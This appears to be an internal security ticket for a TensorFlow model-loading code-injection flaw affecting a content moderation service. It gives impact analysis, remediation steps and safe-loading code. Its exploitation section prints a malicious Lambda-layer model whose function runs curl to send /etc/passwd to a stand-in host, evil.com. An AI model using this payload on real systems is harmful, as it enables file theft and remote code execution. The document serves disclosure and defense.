
🚨 CRITICAL: TensorFlow CVE-2024-77777 - Code injection in model loading

🔴 CRITICAL SECURITY VULNERABILITY

CVE Details

  • CVE ID: CVE-2024-77777
  • Severity: CRITICAL (CVSS 9.8)
  • Package: tensorflow==2.10.0
  • Vulnerability: Code injection via malicious SavedModel
  • Attack Vector: Network, No authentication required
  • Impact: Remote Code Execution (RCE)

Affected Code

File: models/toxicity_classifier.py:34-38

import tensorflow as tf

def load_toxicity_model():
    # ⚠️ VULNERABLE: TensorFlow 2.10.0 has known RCE
    model = tf.keras.models.load_model('models/toxicity_v2.h5')  # VULNERABLE!
    return model

Vulnerability Details

TensorFlow 2.10.0 contains a critical vulnerability in its model loaders (the SavedModel and legacy HDF5/Keras paths):

  • Lambda layers can execute arbitrary Python code
  • Custom objects not properly sandboxed
  • Malicious models can execute system commands

Exploitation

Attacker creates malicious model:

import tensorflow as tf

# Illustrative payload: the Lambda layer's Python function is serialized
# (marshalled bytecode) inside the .h5 file and is executed again on the victim.
def exfiltrate(x):
    # Import inside the payload so it still resolves after deserialization
    __import__('subprocess').run(['curl', 'evil.com/exfil', '--data', '@/etc/passwd'])
    return x

model = tf.keras.Sequential([
    tf.keras.layers.Lambda(exfiltrate, input_shape=(1,)),
])
model.save('malicious_model.h5')

When our service loads this model → attacker code executes!
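On the victim side, this is roughly all it takes (a minimal sketch, assuming the Lambda-layer payload above):

import tensorflow as tf

# Rebuilding the model from its stored config calls each layer to reconstruct the
# graph, so the Lambda's Python body (the exfiltration) runs inside load_model() itself.
model = tf.keras.models.load_model('malicious_model.h5')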

Impact Assessment

Affected Systems:

  • Content moderation API (12 instances)
  • Batch moderation jobs
  • Model training pipeline
  • A/B testing service

Data at Risk:

  • 450K flagged content samples
  • User reports (PII)
  • Model weights
  • API credentials

Business Impact:

  • Safety: Cannot moderate toxic content → platform safety at risk
  • Legal: Must report data breach within 72h (GDPR)
  • Revenue: $30K/day content moderation SLA penalties

Remediation

Immediate (TODAY)

  1. Upgrade TensorFlow
     pip install tensorflow==2.15.1  # Patched version
  2. Audit existing models (see the scanning sketch after this list)
     find models/ -name '*.h5' -mtime -30 | xargs sha256sum
     # Compare against known-good checksums
  3. Disable model uploads until fixed
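
For step 2, a rough way to flag .h5 files that embed Lambda layers without loading them. This is only a heuristic sketch; it assumes h5py is installed and relies on a plain string match against the stored config:

from pathlib import Path
import h5py

def find_lambda_models(models_dir='models'):
    # Keras .h5 files store the architecture as a JSON string in the
    # 'model_config' HDF5 attribute; flag any file that references a Lambda layer.
    flagged = []
    for path in Path(models_dir).glob('*.h5'):
        with h5py.File(path, 'r') as f:
            config = f.attrs.get('model_config', '')
            if '"class_name": "Lambda"' in str(config):
                flagged.append(str(path))
    return flagged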

Short-term (Week 1)

import tensorflow as tf

def load_model_safe(model_path):
    # ✅ SAFE: only deserialize custom objects we ship ourselves
    custom_objects = {'CustomMetric': CustomMetric}  # whitelist (placeholder for our own classes)

    model = tf.keras.models.load_model(
        model_path,
        custom_objects=custom_objects,
        compile=False,    # skip optimizer/loss/metric deserialization
        safe_mode=True    # refuse arbitrary-code (Lambda) deserialization; enforced for the native .keras format
    )
    return model
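
Call sites would then go through the wrapper rather than calling load_model directly. A sketch against load_toxicity_model from models/toxicity_classifier.py; since safe_mode is only enforced for the native .keras format, re-exporting the .h5 artifact is assumed:

def load_toxicity_model():
    # Route every model load through the hardened wrapper
    return load_model_safe('models/toxicity_v2.keras')  # re-exported artifact (assumption)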

Long-term (Week 2-3)

  1. Model signing: Verify model provenance with digital signatures
  2. Sandboxing: Load models in restricted containers
  3. Model scanning: Automated security scanning for suspicious patterns
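
As a stopgap until signing is in place, model integrity can be pinned with SHA-256 digests that are checked before every load. A minimal sketch; the manifest path models/CHECKSUMS.sha256 and its sha256sum-style format are assumptions:

import hashlib
from pathlib import Path

def verify_model_digest(model_path, manifest='models/CHECKSUMS.sha256'):
    # Compare the artifact's SHA-256 digest against the pinned, known-good value
    # recorded out-of-band (e.g. produced by the trusted training pipeline).
    digest = hashlib.sha256(Path(model_path).read_bytes()).hexdigest()
    pinned = {}
    for line in Path(manifest).read_text().splitlines():
        if line.strip():
            value, name = line.split(maxsplit=1)
            pinned[Path(name.strip()).name] = value
    if pinned.get(Path(model_path).name) != digest:
        raise ValueError(f'Digest mismatch for {model_path}; refusing to load')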

Related Issues

Testing

# Verify patched version
python -c "import tensorflow as tf; print(tf.__version__)"
# Should print: 2.15.1

# Run security tests
pytest tests/security/test_model_loading.py
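
A hedged sketch of what tests/security/test_model_loading.py could assert (file layout and test name are assumptions; the real test would target the load_model_safe wrapper): with safe mode on, a model that embeds a Lambda layer must be rejected rather than executed.

import pytest
import tensorflow as tf

def test_lambda_model_is_rejected(tmp_path):
    # Save a .keras model containing a Lambda layer, then confirm that
    # safe-mode loading refuses to deserialize the embedded code.
    path = str(tmp_path / 'lambda_model.keras')
    model = tf.keras.Sequential([
        tf.keras.layers.Lambda(lambda x: x, input_shape=(1,)),
    ])
    model.save(path)
    with pytest.raises(ValueError):
        tf.keras.models.load_model(path, safe_mode=True)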

Acceptance Criteria

  • Upgrade TensorFlow to 2.15.1 across all environments
  • Add model integrity verification
  • Implement safe model loading with whitelisted custom objects
  • Security team pen test
  • Update incident response runbook

PRIORITY: P0 - Production deployment blocked

cc: @sabrina @bill_staples @bob